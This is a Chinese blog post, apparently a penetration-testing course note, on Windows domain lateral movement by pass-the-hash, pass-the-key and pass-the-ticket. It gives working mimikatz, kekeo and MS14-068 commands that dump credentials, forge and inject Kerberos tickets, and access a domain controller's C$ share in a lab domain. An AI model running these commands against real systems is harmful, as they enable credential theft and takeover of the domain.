【内网安全】域横向PTH&PTK&PTT哈希票据传递

最新推荐文章于 2024-05-24 13:13:56 发布
最新推荐文章于 2024-05-24 13:13:56 发布
阅读量2.3k 收藏 9
点赞数
分类专栏: CyberSecurityLearning 文章标签: web安全 安全 内网安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waffle666/article/details/120268915
版权

Kerberos协议具体工作方法,在域中,简要介绍一下:
• 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT(Ticket-Granting Ticket)
• 将TGT进行加密签名返回给客户机器,只有域用户krbtgt才能读取kerberos中TGT数据
• 然后客户机将TGT发送给域控制器KDC请求TGS(票证授权服务)票证,并且对TGT进行检测
• 检测成功之后,将目标服务账户的NTLM以及TGT进行加密,将加密后的结果返回给客户机。

PTH (pass the hash) # 利用lm或者ntlm的值进行的渗透测试
PTT (pass the ticket) # 利用的票据凭证TGT进行的渗透测试
PTK (pass the key) # 利用的ekeys aes256进行的渗透测试(ekeys aes256可以通过mimikatz中sekurlsa::ekeys获取

windows系统LM Hash 及NTLM Hash加密算法,个人系统在windows vista后,服务器系统在windows 2003以后,认证方式均为NTLM Hash

可以把票据理解为登录网站后留下来的cookie,或者说和别人建立连接的一个凭据在你电脑上,这时候你就可以用这个票据进行重新连接,票据就是好比cookie

PTH和PTK连接协议是一样的,PTT协议不同,它是kerberos协议。

PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash远程访问主机或者服务,而不提供明文密码。(也就是说不需要得到明文密码,只需要得到加密值就可以攻击)

如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击。

总结:KB2871997补丁后的影响(systeminfo可以查看补丁信息)
pth:没打补丁用户都可以连接,打了补丁只能administrator连接
ptk:打了补丁才能用户都可以连接,采用aes256连接
KB22871997是否真的能防御PTH攻击? - FreeBuf网络安全行业门户

# PTT攻击的部分就不是简单的NTLM认证了,它是利用Kerberos协议进行攻击的,这里就介绍三种常见的攻击方法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到内存中实现连接。

MS14-068基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)
其中Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术
MS14-068造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780

• 域横向移动PTH传递-Mimikatz
• 域横向移动PTK传递-Mimikatz
• 域横向移动PTT传递-MS14068&kekeo&local
• 国产Ladon内网杀器测试验收-信息收集,连接等 

案例1-域横向移动PTH传递-Mimikatz

       Pass The Hash哈希传递。该方法通过找到账户相关的密码散列值(通常是NTLM hash)来进行攻击。在域环境中,用户登录计算机时大都是域账号,大量计算机在安装的时候会使用相同的本地管理员账号密码,因此,如果计算机的本地管理账号和密码也是相同,攻击者就能使用hash传递攻击的方法登录内网中其他计算机。同时,通过哈希传递攻击,攻击者不需要花费事假破解密码散列值(进而会的明文密码) 。

PTH(哈希传递pass the hash)传递就可以借助工具mimikatz,这款工具不仅是凭证的获取工具,就是获取明文密码的工具,还可以进行相关攻击,比如说

PTH ntlm传递
未打补丁下的工作组及域连接:
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7(假设知道域控上的hash)
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c(workgroup是连接本地用户)
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

\OWA2010CN-God.god.org(域控)

实验演示:

打开2008R2 x64 Webserver的powershell:

命令:
privilege::debug
sekurlsa::logonPasswords(获取明文密码)

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7(mimikatz运行后会弹出一个窗口cmd)
在弹出的窗口中输入dir \\192.168.3.21\c$(ip地址不识别的话可以换成计算机名)

案例2-域横向移动PTK传递-mimikatz

PTK aes256传递
打补丁后的工作组及域连接:
sekurlsa::ekeys #获取aes
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

PTK:必须打了补丁才能用户连接

 案例3-域横向移动PTT传递-ms14068漏洞&kekeo工具&本地

第一种利用漏洞:
能实现普通用户直接获取域控system权限

MS14-068 powershell执行

1.查看当前sid whoami/user
2.mimikatz # kerberos::purge        //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造(不用提升权限)
mimikatz # kerberos::list                //查看当前机器凭证
mimikatz # kerberos::ptc 票据文件名称   //将票据注入到内存中
3.利用ms14-068生成TGT数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
4.票据注入内存
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
5.查看凭证列表 klist(当前计算机和哪些东西进行连接,如果要删除票据可以使用命令klist purge)
6.利用
dir \192.168.3.21\c$(或者net user连接)如果ip连接不了就可以用计算机名

这个票据传递的原理就是生成一个合法的连接请求,然后用mimikatz导入内存中,所以连接的时候就不用连接密码


第二种利用工具kekeo

1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看凭证 klist
4.利用net use载入
dir \192.168.3.21\c$


第三种利用本地票据(需本地管理员权限)

其实就是一种伪造cookie的攻击思路,首先用mimikatz把本地的票据收集再导入内存

sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi(就相当于把以前的“cookie”弄出来,再看看还能不能用,凭据在十小时之内导出才有效)
总结:ptt传递不需本地管理员权限,连接时主机名连接,基于漏洞,工具,本地票据

案例4-国产Ladon内网杀器测试验收

信息收集-协议扫描-漏洞探针-传递攻击等

大型内网渗透扫描器&Cobalt Strike,Ladon8.9内置120个模块,包含信息收集/存活主机/端口扫描/服务识别/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2,密码口令爆破(Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbios/LDAP/SmbHash/WmiHash/Winrm),远程执行命令(smbexec/wmiexe/psexec/atexec/sshexec/webshell),降权提权Runas、GetSystem,Poc/Exploit,支持Cobalt Strike 3.X-4.0

GitHub - k8gege/Ladon at v6.1

涉及资源:
https://github.com/k8gege/Ladon
https://github.com/gentilkiwi/kekeo/releases
https://github.com/abatchy17/indowsExploits/tree/master/MS14-068
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw提取码:xiao

Wαff1ε
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
内网安全-横向PTH&PTK&PTT哈希票据传递
xhscxj的博客
03-14 1083
PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 案例 1-横向移动 PTH 传递-mimikatz PTH ntlm 传递 未打补丁下的工作组及连接: sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20.
PTK密钥传递攻击
最新发布
Y22Lee的博客
05-24 676
PTK(Pass The key),中文叫密钥传递攻击,PTH传递中,使用的是NTLM-HASH值,PTK使用AES256或者AES128的方式进行传递,PTK 攻击只能用于kerberos认证中,NTLM认证中没有!Microsoft发布了KB2871997补丁,它主要囊括了Windows 8.1和Windows Server 2012 R2中增强的安全保护机制。
内网横向PTH&PTK&PTT哈希票据传递
mingyqf的博客
11-12 3977
内网横向PTH&PTK&PTT哈希票据传递 Kerberos 协议具体工作方法,在中,简要介绍一下:  客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用 krbtgt 密码 hash 作为密钥),发送给 kdc(控),kdc 对用户进行检 测,成功之后创建 TGT(Ticket-Granting Ticket)  将 TGT 进行加密签名返回给客户机器,只有用户 krbtgt 才能读 取 kerberos 中 TGT 数据  然后客户机将 TGT 发送给
内网渗透】横向PTH&PTK&PTT哈希票据传递
ssrf
03-07 1274
目录0x001 相关知识0x002 横向移动PTH NTML传递0x003 横向移动PTK aes256传递0x004 横向移动PTT哈希票据传递-ms14068&kekeo&本地0x005 开源内网神器Ladon 0x001 相关知识 1)PTH(pass the hash) 利用LM或NTLM的值进行的渗透测试 PTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。 如果禁用了NTLM认证,
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4232
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
pth-toolkit:传递哈希工具集合的修改版本可以直接开箱即用
06-26
pth-工具包 传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补...
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
02-06
哈希传递(Pass-the-Hash,PTH)是一种网络安全攻击手段,攻击者在获取了目标系统的NTLM哈希后,可以不需知道原始密码就能在该网络内其他系统上进行身份验证,从而控制系统。这种攻击方式对Windows环境尤其具有威胁...
内网横向移动密码凭证获取总结.pdf
12-08
总的来说,内网横向移动中的密码凭证获取涉及多种技术和工具,包括利用注册表备份、内存分析以及哈希传递。了解这些方法对于网络安全防御者来说至关重要,因为它们能帮助识别潜在的攻击途径,并采取相应的保护措施,...
Altium输出gerber&Drill详细方法和步骤
11-17
在Altium Designer中输出Gerber文件是电路板制造的重要步骤之一,它能够确保设计者的设计意图准确无误地传递给制造商。以下是详细的步骤: **Step1:放置分孔图列表字符串** - 打开所需转换的PCB布局文件,通常为...
第68天-内网安全-横向 PTH&PTK&PTT 哈希票据
MCTSOG的博客
05-18 893
思维导图 知识点 Kerberos 协议 具体工作方法,在中,简要介绍一下: 客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt 密码 hash 作为密钥),发送给 kdc(控),kdc 对用户进行检测,成功之后创建 TGT(Ticket-Granting Ticket) 将 TGT 进行加密签名返回给客户机器,只有用户 krbtgt 才能读 取 kerberos 中 TGT 数据 然后客户机将 TGT 发送给控制器 KDC 请求 TGS(票证授权服务)票证,并且对
横向渗透-PTT票据传递之kerberos认证原理详解
m0_62783065的博客
09-21 345
横向渗透-PTT票据传递之kerberos认证原理详解
内网渗透—哈希传递攻击PTH的几种方式
oiadkt的博客
03-11 711
内网渗透—哈希传递攻击PTH的几种方式
内网渗透之横向移动PTH&PTT&PTK
m0_62207170的博客
04-23 908
内网渗透之横向移动PTH&PTT&PTK
内网渗透(四) | 票据传递攻击
Ms08067安全实验室
06-29 2595
票据传递攻击(Pass the Ticket,PtT)票据传递攻击(PtT)是基于Kerberos认证的一种攻击方式,常用来做后渗透权限维持。黄金票据攻击利用的前提是得到了内krbtg...
AD渗透 | PTH&PTK哈希传递攻击手法
m0_57221101的博客
04-13 1144
AD渗透的第二篇,托更一下Kerberos协议的分析文章,等到攻击手法研究明白了,再把协议分析放上来,防止像那些理解不明不白的人写的东西一样祸害人。 发生情况 在高版本的windows server下账号密码不再以明文的方式保存,转而以hash的形式储存,但是假如我们在攻击的时候抓取到了用户hash也可以直接用hash来直接通过验证,模拟用户登录 原理 由于验证原理的问题密码是在本地计算成hash,然后使用hash加密时间戳作为pre-Authention-data来上传,因此如果我们使用自己的脚
内网渗透- *** PTH传递哈希)***PTT传递票据)***PTK传递密钥)
战神/calmness的博客
10-01 858
目录 PTH(pass-the-hash) Mimikatz wmiexec 第一种: 第二种: CrackMapExec PTT(pass the ticket) ms14-068 Golden ticket (黄金票据) silver ticket (白银票据PTK (pass the key) ​​​​​​​ PTH(pass-the-hash) 描述 pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM .
黄金票据和白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 5326
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
pth.ptt,ptk是什么
05-30
pth.pttptk都是Windows系统中用于进行NTLM Hash转储攻击的工具。NTLM Hash是Windows系统中用于进行身份验证的一种方式,攻击者可以使用工具获取用户的NTLM Hash值,然后通过破解获取明文密码或者利用哈希转储攻击获得访问权限。其中,pth.ptt是Pass-the-Hash的缩写,用于使用NTLM Hash值直接进行身份验证。而ptk则是Pass-the-Ticket的缩写,用于利用Kerberos票据进行身份验证,可绕过NTLM身份验证,提高攻击效率。这两种工具都是黑客进行渗透测试时会使用的工具。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值